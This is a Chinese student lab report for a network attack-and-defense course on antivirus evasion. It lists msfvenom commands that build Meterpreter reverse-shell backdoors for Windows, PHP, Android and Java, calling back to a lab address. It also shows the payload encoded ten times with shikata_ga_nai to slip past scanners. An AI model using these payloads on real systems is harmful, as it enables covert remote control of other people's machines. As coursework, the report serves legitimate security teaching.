其他分享
首页 > 其他分享> > 20181328 《网络对抗技术》Exp3 免杀原理与实践

20181328 《网络对抗技术》Exp3 免杀原理与实践

作者:互联网

一、实验内容:

二、实验要求:

 

三、实验步骤:

 

一、正确使用msf编码器

1.使用msfvenom -l encoders查看可以使用的编码器来生成不同的后门

 msfvenom -l encoders 

 

2.对实验二生成的20181328_backdoor.exe后门程序用VirusTotal进行扫描,结果如下图所示:

 

 

 

一次编码:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.19.136 LPORT=1328 -f exe > csq-encoded.exe 

 

十次编码:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.19.136 LPORT=1328 -f exe > csq-encoded10.exe

 

3.msfvenom生成php文件

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.19.136 lport=1328 x> zwq_backdoor.php

 

 4.msfvenom生成apk文件

 

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.19.136 lport=1328 x> zwq_backdoor.apk

 

 

 

 

 

 

5.msfvenom生成jar文件

 

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.19.136 LPORT=1328 x> zwq_backdoor_java.jar

 

 

 

 

标签:exe,免杀,Exp3,1328,tcp,生成,192.168,20181328,msfvenom
来源: https://www.cnblogs.com/1005zwq/p/14615960.html